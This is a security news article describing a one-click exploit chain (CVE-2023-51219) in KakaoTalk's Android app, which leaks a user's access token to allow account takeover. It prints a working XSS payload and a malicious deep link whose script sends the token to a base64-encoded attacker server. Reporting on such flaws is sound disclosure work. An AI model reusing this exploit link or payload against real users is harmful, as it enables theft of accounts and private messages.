1-Click Exploit In Kakaotalk’s Android App Allows Arbitrary Code Execution

KakaoTalk is an Android application that is predominantly installed and used by over 100 million people.

It is a widely popular application in South Korea that has payment, ride-hailing services, shopping, email etc., But the end-to-end encryption is not enabled by default on KakaoTalk as it is an opt-in feature under the name “Secure Chat”. 

Further, this End-to-end encryption is not supported in group messaging or voice calling.

However, KakaoTalk has been discovered with a critical vulnerability that could allow an unauthorized remote threat actor to leak an access token of a victim via an HTTP request header. 

In addition, this token can also be used to take over the victim’s user account and read their chat messages by registering an attacker-controlled device.

This vulnerability has been assigned with CVE-2023-51219 and the severity is yet to be categorized.

Scan Your Business Email Inbox to Find Advanced Email Threats - Try AI-Powered Free Threat Scan

1-Click Exploit Vulnerability

According to the reports shared with Cyber Security News, the main entry point of this vulnerability is the CommerceBuyActivity webview which has multiple attack points as follows:

  • It can be started with a Deep link (adb shell am start kakaotalk://buy)
  • Javascript enabled
  • supports Intent:// that can be used to send data to other non-exported app components via JS
  • No sanitization
  • Leaks an Authorization HTTP header that can be done through Netcat listener in a terminal window and running the $ adb shell am start kakaotalk://buy to start the CommerceBuyActivity WebView

However, though there is an option to leak the Authorization header using GET request, there is small validation there that prevents an attacker from loading any arbitrary attacker-controlled URLs.

To overcome this issue, the code was analyzed which provided information that the path, query and fragment of the URL are using the attacker’s input.

URL Redirect To DOM XSS

As KakaoTalk has a same origin policy that does not load any arbitrary URLs, researchers were checking to see if there are any kakao domains that are vulnerable to DOM XSS.

There was one endpoint identified that was vulnerable to redirection to any kakao domain.

To leverage this same site open-redirect for malicious purposes, there was an XSS flaw discovered.

This XSS flaw was found in the m.shoppinghow.kakao.com subdomain which used DOM Invader Canary string and already had an Stored XSS payload. The XSS payload was so simple which was “><img src=x onerror=alert(1);>. 

So combining this XSS, attackers created a malicious deep link which was kakaotalk://auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Y25001977964/q:”><img src=x onerror=alert(1);>.

This leaked the user’s access token via the Authorization header which was then sent to the attacker-controlled server by encoding the attacker URL to base64.

kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:”><img src=x onerror=”document.location=atob(‘aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv’);”>

As a matter of fact, this token can be used to take over the victim’s Kakao mail account that was used for registration.

Additionally, if the user does not have a Kakao mail account, an attacker can still create a new Kakao Mail account and see the chat messages. 

Furthermore, another interesting thing is that the Kakao Mail account overwrites the user’s previous registered mail address without any additional checks.

Further the researchers have also detailed about password reset, via Burp, malicious Deep link creation and a Proof-of-concept has also been published on GitHub.

Free Webinar! 3 Security Trends to Maximize MSP Growth -> Register For Free

Eswar

Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Recent Posts

Secure Ideas Achieves CREST Accreditation and CMMC Level 1 Compliance

Secure Ideas, a premier provider of penetration testing and security consulting services, proudly announces its…

9 hours ago

New Phishing Campaign Targets Investors to Steal Login Credentials

Symantec has recently identified a sophisticated phishing campaign targeting users of Monex Securities (マネックス証券), a…

10 hours ago

UAC-0219 Hackers Leverage WRECKSTEEL PowerShell Stealer to Extract Data from Computers

In a concerning development, CERT-UA, Ukraine's Computer Emergency Response Team, has reported a series of…

10 hours ago

Hunters International Linked to Hive Ransomware in Attacks on Windows, Linux, and ESXi Systems

Hunters International, a ransomware group suspected to be a rebrand of the infamous Hive ransomware,…

10 hours ago

Qilin Operators Imitate ScreenConnect Login Page to Deploy Ransomware and Gain Admin Access

In a recent cyberattack attributed to the Qilin ransomware group, threat actors successfully compromised a…

10 hours ago

Operation HollowQuill Uses Malicious PDFs to Target Academic and Government Networks

A newly uncovered cyber-espionage campaign, dubbed Operation HollowQuill, has been identified as targeting academic, governmental,…

10 hours ago